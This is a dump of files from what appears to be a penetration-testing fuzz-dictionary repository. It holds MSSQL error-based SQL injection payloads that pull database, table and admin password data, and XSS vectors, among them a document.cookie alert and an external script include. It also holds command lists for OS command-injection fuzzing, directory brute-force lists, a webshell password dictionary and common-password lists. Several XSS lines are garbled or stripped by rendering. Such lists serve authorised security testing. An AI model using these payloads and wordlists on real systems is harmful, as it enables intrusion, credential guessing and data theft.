44 | %2a
45 | %2b
46 | %2c
47 | %2d
48 | %2e
49 | %2f
50 | %30
51 | %31
52 | %32
53 | %33
54 | %34
55 | %35
56 | %36
57 | %37
58 | %38
59 | %39
60 | %3a
61 | %3b
62 | %3c
63 | %3d
64 | %3e
65 | %3f
66 | %40
67 | %41
68 | %42
69 | %43
70 | %44
71 | %45
72 | %46
73 | %47
74 | %48
75 | %49
76 | %4a
77 | %4b
78 | %4c
79 | %4d
80 | %4e
81 | %4f
82 | %50
83 | %51
84 | %52
85 | %53
86 | %54
87 | %55
88 | %56
89 | %57
90 | %58
91 | %59
92 | %5a
93 | %5b
94 | %5c
95 | %5d
96 | %5e
97 | %5f
98 | %60
99 | %61
100 | %62
101 | %63
102 | %64
103 | %65
104 | %66
105 | %67
106 | %68
107 | %69
108 | %6a
109 | %6b
110 | %6c
111 | %6d
112 | %6e
113 | %6f
114 | %70
115 | %71
116 | %72
117 | %73
118 | %74
119 | %75
120 | %76
121 | %77
122 | %78
123 | %79
124 | %7a
125 | %7b
126 | %7c
127 | %7d
128 | %7e
129 | %7f
130 | %80
131 | %81
132 | %82
133 | %83
134 | %84
135 | %85
136 | %86
137 | %87
138 | %88
139 | %89
140 | %8a
141 | %8b
142 | %8c
143 | %8d
144 | %8e
145 | %8f
146 | %90
147 | %91
148 | %92
149 | %93
150 | %94
151 | %95
152 | %96
153 | %97
154 | %98
155 | %99
156 | %9a
157 | %9b
158 | %9c
159 | %9d
160 | %9e
161 | %9f
162 | %a0
163 | %a1
164 | %a2
165 | %a3
166 | %a4
167 | %a5
168 | %a6
169 | %a7
170 | %a8
171 | %a9
172 | %aa
173 | %ab
174 | %ac
175 | %ad
176 | %ae
177 | %af
178 | %b0
179 | %b1
180 | %b2
181 | %b3
182 | %b4
183 | %b5
184 | %b6
185 | %b7
186 | %b8
187 | %b9
188 | %ba
189 | %bb
190 | %bc
191 | %bd
192 | %be
193 | %bf
194 | %c0
195 | %c1
196 | %c2
197 | %c3
198 | %c4
199 | %c5
200 | %c6
201 | %c7
202 | %c8
203 | %c9
204 | %ca
205 | %cb
206 | %cc
207 | %cd
208 | %ce
209 | %cf
210 | %d0
211 | %d1
212 | %d2
213 | %d3
214 | %d4
215 | %d5
216 | %d6
217 | %d7
218 | %d8
219 | %d9
220 | %da
221 | %db
222 | %dc
223 | %dd
224 | %de
225 | %df
226 | %e0
227 | %e1
228 | %e2
229 | %e3
230 | %e4
231 | %e5
232 | %e6
233 | %e7
234 | %e8
235 | %e9
236 | %ea
237 | %eb
238 | %ec
239 | %ed
240 | %ee
241 | %ef
242 | %f0
243 | %f1
244 | %f2
245 | %f3
246 | %f4
247 | %f5
248 | %f6
249 | %f7
250 | %f8
251 | %f9
252 | %fa
253 | %fb
254 | %fc
255 | %fd
256 | %fe
257 | %ff
258 |
--------------------------------------------------------------------------------
/操作系统命令执行/OSXCommands.fuzz.txt:
--------------------------------------------------------------------------------
1 | alias
2 | alloc
3 | apropos
4 | awk
5 | basename
6 | bash
7 | bg
8 | bind
9 | bless
10 | break
11 | builtin
12 | bzip
13 | cal
14 | caller
15 | case
16 | cat
17 | cd
18 | chflags
19 | chgrp
20 | chmod
21 | chown
22 | chroot
23 | cksum
24 | clear
25 | cmp
26 | comm
27 | command
28 | complete
29 | continue
30 | cp
31 | cron
32 | crontab
33 | curl
34 | cut
35 | date
36 | dc
37 | dd
38 | declare
39 | defaults
40 | df
41 | diff
42 | diff3
43 | dig
44 | dirname
45 | dirs
46 | diskutil
47 | disown
48 | ditto
49 | dot_clean
50 | drutil
51 | dscacheutil
52 | dscl
53 | du
54 | echo
55 | ed
56 | enable
57 | env
58 | eval
59 | exec
60 | exit
61 | expand
62 | expect
63 | export
64 | expr
65 | false
66 | fc
67 | fdisk
68 | fg
69 | file
70 | find
71 | fmt
72 | fold
73 | for
74 | fsck
75 | fsaclctl
76 | fs_usage
77 | ftp
78 | GetFileInfo
79 | getopt
80 | getopts
81 | goto
82 | grep
83 | groups
84 | gzip
85 | hash
86 | head
87 | hdiutil
88 | history
89 | hostname
90 | id
91 | if
92 | info
93 | install
94 | jobs
95 | join
96 | kextfind
97 | kickstart
98 | kill
99 | l
100 | last
101 | launchctl
102 | ll
103 | less
104 | let
105 | lipo
106 | ln
107 | local
108 | locate
109 | logname
110 | login
111 | logout
112 | lpr
113 | lprm
114 | lpstat
115 | ls
116 | lsregister
117 | lsbom
118 | lsof
119 | man
120 | mdfind
121 | mdutil
122 | mkdir
123 | mkfifo
124 | more
125 | mount
126 | mv
127 | net
128 | netstat
129 | networksetup
130 | nice
131 | nohup
132 | ntfs.util
133 | onintr
134 | open
135 | opensnoop
136 | osacompile
137 | osascript
138 | passwd
139 | paste
140 | pbcopy
141 | pbpaste
142 | pico
143 | ping
144 | pkgutil
145 | plutil
146 | pmset
147 | popd
148 | pr
149 | printenv
150 | printf
151 | ps
152 | pushd
153 | pwd
154 | quota
155 | rcp
156 | read
157 | readonly
158 | reboot
159 | return
160 | rev
161 | rm
162 | rmdir
163 | rpm
164 | rsync
165 | say
166 | screen
167 | screencapture
168 | sdiff
169 | security
170 | sed
171 | select
172 | set
173 | setfile
174 | shift
175 | shopt
176 | shutdown
177 | sips
178 | sleep
179 | softwareupdate
180 | sort
181 | source
182 | split
183 | stop
184 | su
185 | sudo
186 | sum
187 | suspend
188 | sw_vers
189 | system_profiler
190 | systemsetup
191 | tail
192 | tar
193 | tee
194 | test
195 | textutil
196 | time
197 | times
198 | top
199 | touch
200 | tr
201 | trap
202 | traceroute
203 | true
204 | tty
205 | type
206 | ufs.util
207 | ulimit
208 | umask
209 | umount
210 | unalias
211 | uname
212 | unexpand
213 | uniq
214 | units
215 | unset
216 | until
217 | users
218 | uuencode
219 | uudecode
220 | uuidgen
221 | uucp
222 | vi
223 | wait
224 | wc
225 | whatis
226 | where
227 | which
228 | while
229 | who
230 | whoami
231 | write
232 | xargs
233 | yes
234 |
--------------------------------------------------------------------------------
/SQL注入测试/MSSQL/MS-SQL.txt:
--------------------------------------------------------------------------------
1 | convert(int,@@version COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
2 | convert(int,user COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
3 | convert(int,system_user COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
4 | convert(int,host_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
5 | convert(int,@@SERVERNAME COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
6 | convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
7 | convert(int,(char(72)%2bchar(82)%2b(select top 1 cast(count([name]) as nvarchar(4000)) from [master]..[sysdatabases] )%2bchar(82)%2bchar(72))) and 1=1
8 | convert(int,(select cast(name as nvarchar(4000)) from master..sysdatabases where dbid=N)) and 1=1
9 | convert(int,(char(72)%2bchar(82)%2b(select top 1 cast(count(*) as nvarchar(4000)) from information_schema.tables )%2bchar(82)%2bchar(72))) and 1=1
10 | convert(int,(char(126)%2b(select distinct top 1 table_name from (select distinct top N table_name from information_schema.tables order BY table_name ASC) sq order BY table_name DESC)%2bchar(126))) and 1=1
11 | convert(int,(char(126)%2b(select distinct top 1 column_name from (select distinct top N column_name from information_schema.columns where table_name= order BY column_name ASC) sq order BY column_name DESC)%2bchar(126))) and 1=1
12 | convert(int,(char(72)%2bchar(82)%2b(select top 1 cast(count(*) as nvarchar(4000)) from [TableName] )%2bchar(82)%2bchar(72))) and 1=1
13 | convert(int,(char(72)%2bchar(82)%2b(select top 1 isnull([PASSWD],char(126))%2bchar(94)%2bisnull([USERNAME],char(126)) from (select top 1 [PASSWD],[USERNAME] from [Admin] order by [PASSWD] asc) sq order by [PASSWD] desc)%2bchar(82)%2bchar(72))) and 1=1
14 | convert(int,(char(126)%2b(select distinct top 1 table_name from (select distinct top N table_name from DatabaseName.OwnerName.ObjectORtableName order BY table_name ASC) sq order BY table_name DESC)%2bchar(126))) and 1=1
15 | convert(int,(char(126)%2b(select distinct top 1 table_name from (select distinct top 1 table_name from logosoft.information_schema.tables order BY table_name ASC) sq order BY table_name DESC)%2bchar(126))) and 1=1
16 | convert(int,(char(126)%2b(select distinct top 1 column_name from (select distinct top N column_name from DatabaseName.OwnerName.ObjectORColumnName where table_name= order BY column_name ASC) sq order BY column_name DESC)%2bchar(126))) and 1=1
17 | convert(int,(char(72)%2bchar(82)%2b(select top 1 cast(count(*) as nvarchar(4000)) from [DatabaseName]..[TableName] )%2bchar(82)%2bchar(72))) and 1=1
18 | convert(int,(char(82)%2bchar(33)%2b(select top 1 isnull([ColumnName],char(32)) from (select top 1 [ColumnName] from [DatabaseName]..[TableName] order by [ColumnName] asc) sq order by [ColumnName] desc)%2bchar(33)%2bchar(82))) and 1=1
--------------------------------------------------------------------------------
/Password dictionary/200多个文件名.dict:
--------------------------------------------------------------------------------
1 | a
2 | about
3 | aboutus
4 | addUser
5 | admin
6 | administration
7 | admins
8 | ads
9 | advertise
10 | app
11 | archive
12 | archives
13 | arrow
14 | article
15 | articles
16 | at
17 | atom
18 | b
19 | backup
20 | banner
21 | banners
22 | blank
23 | blog
24 | blogs
25 | books
26 | business
27 | buttons
28 | calc
29 | calendar
30 | careers
31 | category
32 | cgi-bin
33 | changepass
34 | changepasswd
35 | changepassword
36 | changepwd
37 | chgpass
38 | chgpasswd
39 | chgpassword
40 | chgpwd
41 | chpass
42 | chpasswd
43 | chpassword
44 | chpwd
45 | clients
46 | comments
47 | common
48 | community
49 | company
50 | contact
51 | contactus
52 | content
53 | copyright
54 | crack
55 | cron
56 | data
57 | default
58 | dir
59 | directory
60 | docs
61 | download
62 | downloads
63 | education
64 | email
65 | en
66 | english
67 | etc
68 | events
69 | faq
70 | features
71 | feed
72 | feedback
73 | file
74 | files
75 | foot
76 | footer
77 | forum
78 | forums
79 | frame1
80 | frame2
81 | framemain
82 | ftp
83 | full
84 | gallery
85 | games
86 | go
87 | graphics
88 | head
89 | header
90 | help
91 | history
92 | home
93 | html
94 | i
95 | icons
96 | image
97 | images
98 | img
99 | in
100 | index
101 | info
102 | internet
103 | jobs
104 | keygen
105 | legal
106 | lib
107 | library
108 | links
109 | linux
110 | list
111 | log
112 | login
113 | logo
114 | logoff
115 | logon
116 | logos
117 | logout
118 | main
119 | mainframe
120 | media
121 | menu
122 | menuitem
123 | misc
124 | modules
125 | music
126 | nav
127 | new
128 | newpass
129 | newpasswd
130 | newpassword
131 | newpw
132 | news
133 | newsletter
134 | newUser
135 | page
136 | pages
137 | papers
138 | partners
139 | pass
140 | passwd
141 | passwd.adjunct
142 | password
143 | passwords
144 | pdf
145 | people
146 | photos
147 | press
148 | print
149 | privacy
150 | product
151 | products
152 | profile
153 | projects
154 | pub
155 | publications
156 | pwd
157 | ref
158 | register
159 | research
160 | resources
161 | reviews
162 | robots
163 | rss
164 | s
165 | sample
166 | search
167 | secret
168 | security
169 | serial
170 | services
171 | setpass
172 | setpasswd
173 | setpassword
174 | setpwd
175 | shared
176 | site
177 | sitemap
178 | software
179 | spacer
180 | spam
181 | sports
182 | stats
183 | store
184 | stories
185 | story
186 | submit
187 | subscribe
188 | support
189 | system
190 | technology
191 | templates
192 | terms
193 | themes
194 | tools
195 | top
196 | uploads
197 | user
198 | users
199 | video
200 | view
201 | warez
202 | web
203 | welcome
204 | wiki
205 | www
206 | xml
207 | 0
208 | 1
209 | 2
210 | 2007
211 | 2008
212 | 2009
213 | 2010
214 | 3
215 | 4
216 | 5
217 | 6
218 | 7
219 | 8
220 | 9
221 |
--------------------------------------------------------------------------------
/操作系统命令执行/WindowsPowershell.fuzz.txt:
--------------------------------------------------------------------------------
1 | get-acl
2 | set-acl
3 | get-alias
4 | import-alias
5 | new-alias
6 | set-alias
7 | get-authenticodesignature
8 | set-authenticodesignature
9 | set-location
10 | get-childitem
11 | get-command
12 | measure-command
13 | trace-command
14 | add-content
15 | get-content
16 | set-content
17 | clear-content
18 | convertto-html
19 | convertfrom-securestring
20 | convertto-securestring
21 | clear-host
22 | clear-item
23 | copy-item
24 | get-credential
25 | get-childitem
26 | get-date
27 | set-date
28 | remove-item
29 | do
30 | get-psdrive
31 | new-psdrive
32 | remove-psdrive
33 | get-eventlog
34 | get-executionpolicy
35 | set-executionpolicy
36 | export-alias
37 | export-clixml
38 | export-console
39 | export-csv
40 | invoke-expression
41 | exit
42 | foreach-object
43 | foreach
44 | for
45 | format-custom
46 | format-list
47 | format-table
48 | format-wide
49 | get-item
50 | get-childitem
51 | get-help
52 | add-history
53 | get-history
54 | invoke-history
55 | get-host
56 | clear-host
57 | read-host
58 | write-host
59 | if
60 | import-clixml
61 | import-csv
62 | get-item
63 | invoke-item
64 | new-item
65 | remove-item
66 | set-item
67 | clear-itemproperty
68 | copy-itemproperty
69 | get-itemproperty
70 | move-itemproperty
71 | new-itemproperty
72 | remove-itemproperty
73 | rename-itemproperty
74 | set-itemproperty
75 | stop-process
76 | get-location
77 | pop-location
78 | push-location
79 | set-location
80 | add-member
81 | get-member
82 | move-item
83 | compare-object
84 | group-object
85 | measure-object
86 | new-object
87 | select-object
88 | sort-object
89 | where-object
90 | out-default
91 | out-file
92 | out-host
93 | out-null
94 | out-printer
95 | out-string
96 | powershell
97 | convert-path
98 | join-path
99 | resolve-path
100 | split-path
101 | test-path
102 | get-pfxcertificate
103 | pop-location
104 | push-location
105 | get-process
106 | stop-process
107 | clear-itemproperty
108 | copy-itemproperty
109 | get-itemproperty
110 | move-itemproperty
111 | new-itemproperty
112 | remove-itemproperty
113 | rename-itemproperty
114 | set-itemproperty
115 | get-psprovider
116 | set-psdebug
117 | add-pssnapin
118 | get-pssnapin
119 | remove-pssnapin
120 | quest
121 | read-host
122 | remove-item
123 | rename-item
124 | rename-itemproperty
125 | run/call
126 | select-object
127 | get-service
128 | new-service
129 | restart-service
130 | resume-service
131 | set-service
132 | sort-object
133 | start-service
134 | stop-service
135 | suspend-service
136 | start-sleep
137 | switch
138 | select-string
139 | tee-object
140 | new-timespan
141 | trace-command
142 | get-tracesource
143 | set-tracesource
144 | start-transcript
145 | stop-transcript
146 | get-uiculture
147 | get-unique
148 | update-formatdata
149 | update-typedata
150 | clear-variable
151 | get-variable
152 | new-variable
153 | remove-variable
154 | set-variable
155 | where-object
156 | where
157 | while
158 | get-wmiobject
159 | write-debug
160 | write-error
161 | write-output
162 | write-progress
163 | write-verbose
164 | write-warning
165 |
--------------------------------------------------------------------------------
/Password dictionary/224条webshell密码.dict:
--------------------------------------------------------------------------------
1 | !@#123
2 | *******
3 | 000
4 | 1
5 | 10011C120105101
6 | 111
7 | 12
8 | 123
9 | 123!@#
10 | 123321
11 | 12345
12 | 123456
13 | 123654
14 | 123654789
15 | 123654789!
16 | 123654789.
17 | 123go
18 | 1314520
19 | 133135136
20 | 13572468
21 | 19880118
22 | 1992724
23 | 20080808
24 | 3452510
25 | 360
26 | 360sb
27 | 376186027
28 | 3est
29 | 45189946
30 | 4816535
31 | 4lert
32 | 4ngel
33 | 520
34 | 52013
35 | 5201314
36 | 5201314
37 | 520hack
38 | 521
39 | 535039
40 | 54321
41 | 584521
42 | 654321
43 | 654321
44 | 80sec
45 | 847381979
46 | 847381979
47 | 888999
48 | 96315001
49 | 981246
50 | admin
51 | admin888
52 | aiezu
53 | air
54 | angel
55 | aoyunhui
56 | asp
57 | aspadmin
58 | aspxadmin
59 | axiao
60 | baidu
61 | baiduadmin
62 | baidusb
63 | Baike
64 | bzxyd
65 | bzxyd
66 | C
67 | caodan
68 | caonima
69 | caonimade
70 | caonimadebi
71 | caonimei
72 | cc
73 | ceshi2009
74 | chengnuo
75 | chenxue
76 | chinared
77 | chuang
78 | cmdshell
79 | cms
80 | cnot
81 | dangdang
82 | danteng
83 | dantong
84 | daohao
85 | daoke
86 | daoker
87 | daokers
88 | daoqq
89 | darkst
90 | dreamh
91 | et520
92 | Evav
93 | evil
94 | evilhack
95 | evilhacker
96 | evilhk
97 | F.S.T
98 | f19ht
99 | fclshark
100 | fight
101 | fst
102 | fuck
103 | fucker
104 | fuckhack
105 | fuckhacker
106 | fuckit
107 | FuckYou
108 | G.xp
109 | ghost
110 | ghost
111 | gxp
112 | h4ck
113 | h4ck3r
114 | hack
115 | hack520
116 | hacker
117 | hackersb
118 | hackqingshu
119 | hacksb
120 | hake
121 | hakecc
122 | haode
123 | heixiaozi
124 | hkk007
125 | hkmjj
126 | hkmm
127 | hongker
128 | honker
129 | HqzX
130 | huaidan
131 | iamnotadmin
132 | iloveshell
133 | jcksyes
134 | jiaozhu
135 | jiaozu
136 | jing
137 | jinjin
138 | jspadmin
139 | jtk2352
140 | kill
141 | kissy
142 | lcx
143 | lengfeng
144 | lengfengsk
145 | lengxue
146 | lin
147 | liner
148 | login
149 | love
150 | lovehack7758
151 | lover
152 | loveshell
153 | lunnijie
154 | lx
155 | maek
156 | mama
157 | mama520
158 | nc
159 | noadmin
160 | nohack
161 | noid
162 | ouou
163 | phpadmin
164 | qingshu
165 | qingshu$
166 | r4sky
167 | rensheng
168 | rfkl
169 | rinima
170 | rs
171 | rusuan
172 | sa
173 | sadness
174 | sasa
175 | Satan
176 | sb
177 | sb360
178 | sh3ll
179 | shaomo
180 | shell
181 | shunzi
182 | sin
183 | spider
184 | sq19880602
185 | sunzi
186 | sz
187 | T00ls
188 | tag
189 | tengxin
190 | tengxunsb
191 | tig
192 | tiger
193 | tonecan
194 | tx
195 | ufo
196 | ufohack
197 | username
198 | webadmin
199 | webadmin2
200 | WebShell
201 | whatweb
202 | windows
203 | winner
204 | wocaonima
205 | worinima
206 | wrsk
207 | wrsky
208 | wuzheng
209 | wwwhakecc
210 | xiaoe
211 | xiaowu
212 | xiaoyi
213 | xxoxx
214 | xxxxx
215 | ying
216 | yong
217 | youaresb
218 | youguest
219 | yrpx
220 | yuemo
221 | yushiwuzheng
222 | yy
223 | yyswxws
224 | zhack
225 | zzzzzz
226 | mm
227 | yjh
--------------------------------------------------------------------------------
/XSS测试/docs.wasc-scriptmapping/license.txt:
--------------------------------------------------------------------------------
1 | Guest Articles Content License
2 | Terms and Conditions for Copying, Distributing, and Modifying
3 |
4 | Items other than copying, distributing, and modifying the Content with
5 | which this license was distributed (such as using, etc.) are outside the
6 | scope of this license.
7 |
8 | 1. You may copy and distribute exact replicas of the OpenContent (OC) as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the OC a copy of this License along with the OC. You may at your option charge a fee for the media and/or handling involved in creating a unique copy of the OC for use offline, you may at your option offer instructional support for the OC in exchange for a fee, or you may at your option offer warranty in exchange for a fee. You may not charge a fee for the OC itself. You may not charge a fee for the sole service of providing access to and/or use of the OC via a network (e.g. the Internet), whether it be via the world wide web, FTP, or any other method.
9 |
10 | 2. You may modify your copy or copies of the OpenContent or any portion of it, thus forming works based on the Content, and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions:
11 |
12 | a) You must cause the modified content to carry prominent notices stating that you changed it, the exact nature and content of the changes, and the date of any change.
13 |
14 | b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the OC or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License, unless otherwise permitted under applicable Fair Use law.
15 |
16 | These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the OC, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the OC, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Exceptions are made to this requirement to release modified works free of charge under this license only in compliance with Fair Use law where applicable.
17 |
18 | 3. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to copy, distribute or modify the OC. These actions are prohibited by law if you do not accept this License. Therefore, by distributing or translating the OC, or by deriving works herefrom, you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or translating the OC.
19 |
20 | NO WARRANTY
21 |
22 | 4. BECAUSE THE OPENCONTENT (OC) IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE OC, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE OC "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK OF USE OF THE OC IS WITH YOU. SHOULD THE OC PROVE FAULTY, INACCURATE, OR OTHERWISE UNACCEPTABLE YOU ASSUME THE COST OF ALL NECESSARY REPAIR OR CORRECTION.
23 |
24 | 5. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MIRROR AND/OR REDISTRIBUTE THE OC AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE OC, EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
25 |
26 |
--------------------------------------------------------------------------------
/XSS测试/XSSvectorCHECK.txt:
--------------------------------------------------------------------------------
1 | ')alert('xss');
2 | ");alert('xss');
3 | XSS DETECTED by HR .html
4 |
5 |
6 | <0x736372697074>alert('XSS')
7 | alert('XSS')
8 | <0x736372697074>alert(String.fromCharCode(88, 83, 83))
9 | alert(String.fromCharCode(88, 83, 83))
10 |
11 | ">XSS DETECTED by HR .html
12 | ">
13 | ">
14 | "><0x736372697074>alert('XSS')
15 | ">alert('XSS')
16 | "><0x736372697074>alert(String.fromCharCode(88, 83, 83))
17 | ">alert(String.fromCharCode(88, 83, 83))
18 | ">
19 | %22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F%73%63%72%69%70%74%3E
20 | "><script>alert('XSS')</script>
21 | "><script>alert('XSS')</script>
22 | Ij48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pg==
23 |
24 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72, 82))//";alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72, 82))//\";alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72, 82))//-->">'>
25 | <
26 |
28 | \";alert('XSS');//
29 |
30 | 
31 | ;)
32 | ![](javascript:alert("XSS"))
33 | ![]() ">
34 |
35 |
36 |
37 |
38 | ![]()
39 | ![](vbscript:msgbox("XSS"))
40 |
41 |
42 |
43 |
44 |
45 | ))
46 | )
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 | %3Cscript%3alert(document.cookie);%3C%2Fscript%3
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
--------------------------------------------------------------------------------
/XSS测试/xss-rsnake.txt:
--------------------------------------------------------------------------------
1 | # credit to rsnake
2 |
3 | '';!--" =&{()}
4 |
5 |
6 |
7 | )
8 |
9 | ![](`javascript:alert("RSnake)
10 |
11 | SRC=
![]()
12 |
13 |
14 | ;)
15 |
16 | ;)
17 | ;)
18 | ;)
19 |
20 | '"-->
67 |
69 | +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
70 |
71 |
72 |
73 |
74 | PT SRC="http://ha.ckers.org/xss.js">
75 |
--------------------------------------------------------------------------------
/Password dictionary/400多个目录.dict:
--------------------------------------------------------------------------------
1 | a
2 | about
3 | access
4 | account
5 | accounting
6 | activex
7 | admin
8 | administration
9 | administrator
10 | adminuser
11 | Album
12 | apache
13 | app
14 | appl
15 | applets
16 | application
17 | applications
18 | apply
19 | apps
20 | archive
21 | archives
22 | article
23 | articles
24 | auth
25 | author
26 | authors
27 | b
28 | backup
29 | backups
30 | beta
31 | bin
32 | binaries
33 | binary
34 | blog
35 | browse
36 | buy
37 | c
38 | cart
39 | catalog
40 | category
41 | cbi-bin
42 | ccards
43 | cert
44 | certificate
45 | cgi
46 | cgi-bin
47 | class
48 | client
49 | clients
50 | code
51 | com
52 | comments
53 | common
54 | comp
55 | company
56 | compressed
57 | conf
58 | config
59 | configs
60 | connect
61 | contact
62 | contacts
63 | contactus
64 | content
65 | core
66 | crack
67 | credit
68 | cust
69 | custom
70 | customer
71 | customers
72 | data
73 | database
74 | databases
75 | datafiles
76 | db
77 | debug
78 | default
79 | delete
80 | demo
81 | demos
82 | demouser
83 | dev
84 | devel
85 | development
86 | dir
87 | directories
88 | directory
89 | doc
90 | doc-html
91 | docs
92 | document
93 | documentation
94 | documents
95 | download
96 | downloads
97 | e
98 | email
99 | employees
100 | en
101 | enter
102 | error
103 | errors
104 | events
105 | example
106 | examples
107 | exit
108 | export
109 | external
110 | extranet
111 | f
112 | faq
113 | features
114 | files
115 | find
116 | flash
117 | form
118 | forms
119 | forum
120 | ftp
121 | full
122 | fun
123 | function
124 | g
125 | general
126 | global
127 | globals
128 | graphics
129 | guest
130 | guests
131 | h
132 | help
133 | hidden
134 | home
135 | htm
136 | html
137 | i
138 | I
139 | icons
140 | idea
141 | image
142 | images
143 | img
144 | imp
145 | import
146 | inc
147 | include
148 | includes
149 | index
150 | info
151 | information
152 | install
153 | internal
154 | internet
155 | intranet
156 | inventory
157 | j
158 | js
159 | k
160 | keygen
161 | known
162 | l
163 | lib
164 | libraries
165 | library
166 | license
167 | licenses
168 | links
169 | linux
170 | local
171 | log
172 | logfile
173 | logfiles
174 | logging
175 | login
176 | logo
177 | logout
178 | logs
179 | m
180 | mail
181 | main
182 | man
183 | management
184 | manager
185 | manual
186 | map
187 | maps
188 | marketing
189 | media
190 | member
191 | members
192 | message
193 | messaging
194 | misc
195 | mod
196 | module
197 | modules
198 | n
199 | name
200 | names
201 | new
202 | news
203 | News
204 | notes
205 | o
206 | objects
207 | old
208 | oracle
209 | order
210 | orders
211 | out
212 | p
213 | page
214 | pages
215 | partner
216 | partners
217 | passport
218 | password
219 | passwords
220 | payment
221 | personal
222 | pics
223 | pictures
224 | press
225 | privacy
226 | private
227 | products
228 | profile
229 | protected
230 | proxy
231 | pub
232 | public
233 | publish
234 | purchase
235 | purchases
236 | pw
237 | q
238 | r
239 | Readme
240 | register
241 | report
242 | reports
243 | resources
244 | restricted
245 | retail
246 | reviews
247 | robot
248 | robots
249 | rss
250 | s
251 | sales
252 | save
253 | script
254 | scripts
255 | search
256 | secret
257 | secure
258 | security
259 | sell
260 | serial
261 | server
262 | service
263 | services
264 | servlet
265 | servlets
266 | session
267 | setup
268 | share
269 | shared
270 | shipping
271 | shop
272 | show
273 | site
274 | sitemap
275 | sites
276 | soap
277 | software
278 | source
279 | spacer
280 | sql
281 | src
282 | staff
283 | stat
284 | stats
285 | status
286 | store
287 | stuff
288 | style
289 | styles
290 | stylesheet
291 | stylesheets
292 | sun
293 | supplier
294 | suppliers
295 | supply
296 | support
297 | sys
298 | system
299 | systems
300 | t
301 | tar
302 | target
303 | tech
304 | temp
305 | template
306 | templates
307 | terms
308 | test
309 | testing
310 | tests
311 | themes
312 | ticket
313 | tickets
314 | tip
315 | tips
316 | tmp
317 | ToDo
318 | tool
319 | tools
320 | top
321 | u
322 | unknown
323 | updates
324 | upload
325 | uploads
326 | us
327 | usage
328 | user
329 | users
330 | usr
331 | util
332 | utils
333 | v
334 | vendor
335 | w
336 | warez
337 | web
338 | webadmin
339 | webapps
340 | word
341 | work
342 | world
343 | www
344 | wwwrooot
345 | x
346 | xml
347 | y
348 | z
349 | zip
350 | 1
351 | 2
352 | 2004
353 | 2005
354 | 2006
355 | 2007
356 | 3
357 | 4
358 | 5
359 | 6
360 | 7
361 | 8
362 | 9
363 |
--------------------------------------------------------------------------------
/wordlists-user-passwd/passwds/twitter.txt:
--------------------------------------------------------------------------------
1 | # ripped fro m twitter signup page js :)
2 | 111111
3 | 11111111
4 | 112233
5 | 121212
6 | 123123
7 | 123456
8 | 1234567
9 | 12345678
10 | 131313
11 | 232323
12 | 654321
13 | 666666
14 | 696969
15 | 777777
16 | 7777777
17 | 8675309
18 | 987654
19 | aaaaaa
20 | abc123
21 | abc123
22 | abcdef
23 | abgrtyu
24 | access
25 | access14
26 | action
27 | albert
28 | alexis
29 | amanda
30 | amateur
31 | andrea
32 | andrew
33 | angela
34 | angels
35 | animal
36 | anthony
37 | apollo
38 | apples
39 | arsenal
40 | arthur
41 | asdfgh
42 | asdfgh
43 | ashley
44 | august
45 | austin
46 | badboy
47 | bailey
48 | banana
49 | barney
50 | baseball
51 | batman
52 | beaver
53 | beavis
54 | bigdaddy
55 | bigdog
56 | birdie
57 | bitches
58 | biteme
59 | blazer
60 | blonde
61 | blondes
62 | bond007
63 | bonnie
64 | booboo
65 | booger
66 | boomer
67 | boston
68 | brandon
69 | brandy
70 | braves
71 | brazil
72 | bronco
73 | broncos
74 | bulldog
75 | buster
76 | butter
77 | butthead
78 | calvin
79 | camaro
80 | cameron
81 | canada
82 | captain
83 | carlos
84 | carter
85 | casper
86 | charles
87 | charlie
88 | cheese
89 | chelsea
90 | chester
91 | chicago
92 | chicken
93 | cocacola
94 | coffee
95 | college
96 | compaq
97 | computer
98 | cookie
99 | cooper
100 | corvette
101 | cowboy
102 | cowboys
103 | crystal
104 | dakota
105 | dallas
106 | daniel
107 | danielle
108 | debbie
109 | dennis
110 | diablo
111 | diamond
112 | doctor
113 | doggie
114 | dolphin
